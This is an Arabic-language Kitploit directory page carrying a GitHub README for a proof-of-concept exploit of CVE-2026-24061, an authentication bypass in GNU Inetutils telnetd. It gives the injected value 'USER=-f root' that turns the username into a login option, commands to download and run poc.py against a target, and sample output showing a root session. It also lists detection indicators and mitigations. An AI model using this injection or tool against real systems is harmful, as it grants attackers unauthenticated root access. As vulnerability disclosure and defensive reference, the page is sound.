Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-24061-Telnetd — # CVE-2026-24061 تجاوز المصادقة في GNU Inetutils Telnetd | Kitploit
أدوات/GitHubGitHub/ish3ng0m4/cve-2026-24061-telnetd
تحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالمصادقةالتعلم والتعليمأداة الوصول عن بعد
GitHubish3ng0m4/cve-2026-24061-telnetd

CVE-2026-24061-Telnetd

# CVE-2026-24061 تجاوز المصادقة في GNU Inetutils Telnetd

عرض المستودع
منذ 6س 1دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-24061
تجاوز المصادقة في GNU Inetutils Telnetd

CVE: CVE-2026-24061
الخطورة: حرجة
CVSS: 9.8 (حرجة)
CWE: CWE-88 — تحييد غير صحيح لمحددات الوسائط في أمر
المكوّن المتأثر: GNU Inetutils telnetd
الإصدارات المتأثرة: 1.9.3 حتى 2.7

نظرة عامة

CVE-2026-24061 هي ثغرة حرجة في تجاوز المصادقة في خادم Telnet المقدَّم من GNU Inetutils. ينشأ الثغرة من التحقق غير الكافي من متغير البيئة USER الذي يتحكم فيه العميل عند تفعيل تسجيل الدخول التلقائي في Telnet. يمكن تفسير قيمة خبيثة كخيار لبرنامج تسجيل الدخول النظامي بدلاً من تفسيرها كاسم مستخدم. في ظل التكوينات المعرضة للخطر، يمكن لمهاجم بعيد غير مصادق استغلال هذا السلوك لاستدعاء login مع الخيار -f وتجاوز المصادقة، مما قد يمنحه قشرة صلبة بصلاحيات الحساب المطلوب.

عندما تعمل خدمة Telnet المتأثرة بصلاحيات الجذر، يمكن أن يؤدي الاستغلال الناجح إلى وصول جذر عن بُعد غير مصادق.

الوصف الفني

يمكن تلخيص مسار التنفيذ المعرض للخطر على النحو التالي:

root@kitploit:~
 عميل Telnet
      │
      │ USER=-f root
      ▼
    telnetd
      │
      │ يبني وسائط login
      ▼
 login -f root
      │
      │ تجاوز المصادقة
      ▼
 قشرة جذر

يتم تشغيل المشكلة من خلال التفاعل بين وظيفة تسجيل الدخول التلقائي في Telnet ومعالجة متغير البيئة USER.

القيمة التي يتحكم فيها المهاجم:

root@kitploit:~
 -f root

لا تُعامل بدقة كاسم مستخدم. بدلاً من ذلك، يمكن أن تصبح وسيطًا لـ login، مما ينتج عنه سلوك مكافئ لـ:

root@kitploit:~
 login -f root

يوجه الخيار -f برنامج login لتجاوز عملية المصادقة العادية للمستخدم المحدد.

إثبات المفهوم PoC

يتضمن المستودع إثبات مفهوم بلغة Python 3 يقوم بإجراء اتصال Telnet، ويتعامل مع التفاوض البروتوكولي المطلوب، ويحقن قيمة USER الخبيثة، ويتحقق من الجلسة الناتجة.

استنساخ المستودع (موصى به)

root@kitploit:~
 git clone https://github.com/Ish3ng0m4/CVE-2026-24061-Telnetd.git
 cd CVE-2026-24061-Telnetd
 chmod +x poc.py
 python3 poc.py <TARGET> <PORT>

تنزيل poc.py فقط

root@kitploit:~
 wget https://raw.githubusercontent.com/Ish3ng0m4/CVE-2026-24061-Telnetd/main/poc.py

الاستخدام

اجعل إثبات المفهوم قابلاً للتنفيذ:

root@kitploit:~
 chmod +x poc.py

قم بتشغيله بتوفير عنوان الهدف ومنفذ Telnet:

root@kitploit:~
 python3 poc.py <TARGET> <PORT>

مثال:

root@kitploit:~
 python3 poc.py 127.0.0.1 23

الاستغلال الناجح

ينتج الهدف المعرض للخطر مخرجات مشابهة لما يلي:

CVE-2026-24061 - GNU Inetutils telnetd Auth Bypass

root@kitploit:~
 [*] الهدف: 127.0.0.1:23
 [+] تم الاتصال
 [*] تم حقن USER=-f root
 
 [+] عرضة للخطر

ثم يوفر إثبات المفهوم جلسة تفاعلية.

يمكن تأكيد تصعيد الصلاحيات باستخدام:

root@kitploit:~
 id

النتيجة المتوقعة:

root@kitploit:~
 uid=0(root) gid=0(root) groups=0(root)

هذا يؤكد أن آلية مصادقة Telnet تم تجاوزها وأن الجلسة الناتجة تمتلك صلاحيات الجذر.

سير عمل إثبات المفهوم

يقوم الاستغلال بالعمليات التالية:

يتصل بخدمة Telnet المستهدفة. يقوم بالتفاوض البروتوكولي المطلوب لـ Telnet. يفعّل سلوك تسجيل الدخول التلقائي المطلوب للاستغلال. يوفر القيمة الخبيثة USER=-f root. يسمح لتطبيق telnetd المعرض للخطر بتمرير القيمة المعدلة إلى login. يستقبل الجلسة الناتجة. يوفر طرفية تفاعلية للمشغّل.

لا يعتمد إثبات المفهوم على بيانات اعتماد لمسار المصادقة المعرض للخطر.

التكوينات المتأثرة

يعتمد الاستغلال على تكوين الهدف والتفاعل بين telnetd وتطبيق login النظامي.

الشروط الأساسية هي:

GNU Inetutils telnetd ضمن نطاق الإصدارات المتأثرة.
خدمة Telnet قابلة للوصول من قبل المهاجم.
وظيفة تسجيل الدخول التلقائي مفعّلة أو متاحة.
معالجة معرضة للخطر لمتغير البيئة USER.
تطبيق login متوافق قادر على تفسير الخيار المحقون.

وبالتالي، فإن وجود إصدار Inetutils متأثر وحده لا ينبغي أن يُعتبر دليلاً على قابلية الاستغلال. يجب أيضًا مراعاة تصحيحات التوزيعات وتكوين الخدمة.

التأثير

يمكن أن يؤدي CVE-2026-24061 إلى اختراق كامل لنظام معرض للخطر.

اعتمادًا على الصلاحيات التي يعمل بها telnetd، قد يوفر الاستغلال:

تجاوز المصادقة
وصول غير مصرح به لحساب محلي
تنفيذ أوامر عن بُعد
تصعيد الصلاحيات
وصول بمستوى الجذر
اختراق كامل للنظام

السيناريو الأعلى خطورة هو خدمة Telnet قابلة للوصول عن بُعد حيث يؤدي الاستغلال إلى جلسة جذر.

الاكتشاف

تشمل المؤشرات المحتملة للاستغلال:

اتصالات غير متوقعة على TCP/23.
محاولات مصادقة Telnet باستخدام أسماء مستخدمين غير معتادة.
قيم USER مشبوهة تبدأ بخيارات سطر أوامر.
وسائط غير متوقعة لعملية login.
جلسات جذر تنشأ من telnetd.
عمليات غير متوقعة يتم إطلاقها بواسطة خدمة Telnet.

يجب أن تحدد مراقبة الشبكة أيضًا الأنظمة التي تعرض خدمات Telnet بشكل غير ضروري.

التخفيف

الاستجابة الموصى بها هي إزالة Telnet واستخدام SSH للإدارة عن بُعد.

إذا تعذر إزالة Telnet فورًا:

قم بالترقية إلى إصدار مقدَّم من المورّد يحتوي على الإصلاح الأمني.
قم بتطبيق تحديث الأمان المناسب لنظام التشغيل.
قم بتقييد TCP/23 على شبكات الإدارة الموثوقة.
امنع التعرض المباشر لـ Telnet للشبكات غير الموثوقة.
راقب مصادقة Telnet ونشاط العمليات.

نظرًا لأن توزيعات Linux قد تعيد تطبيق الإصلاحات الأمنية دون تغيير رقم الإصدار العلوي، يجب على المسؤولين التحقق من الحالة الأمنية لحزمة التوزيع الخاصة بهم بدلاً من الاعتماد فقط على الإصدار المعروض.

التحقق

تم إعادة إنتاج الثغرة بنجاح ضد خدمة GNU Inetutils Telnet معرضة للخطر تعمل على Ubuntu 22.04.5 LTS.

أنشأ إثبات المفهوم اتصالاً بـ TCP/23، وحقن:

root@kitploit:~
 USER=-f root

وحصل على جلسة جذر.

أعاد التحقق من الصلاحيات:

root@kitploit:~
 uid=0(root) gid=0(root) groups=0(root)

هذا يوفر تأكيدًا مباشرًا للتأثير الأمني.

إخلاء مسؤولية

تم توفير إثبات المفهوم هذا لأغراض البحث الأمني، والتحقق من الثغرات، واختبار الاختراق المصرح به، والأغراض التعليمية.

اختبر فقط الأنظمة التي لديك إذن صريح لها.

Gabriel D. Ishengoma
الأمن الهجومي · البحث في الأمن السيبراني · التحليل الجنائي الرقمي

تنزيل الأداة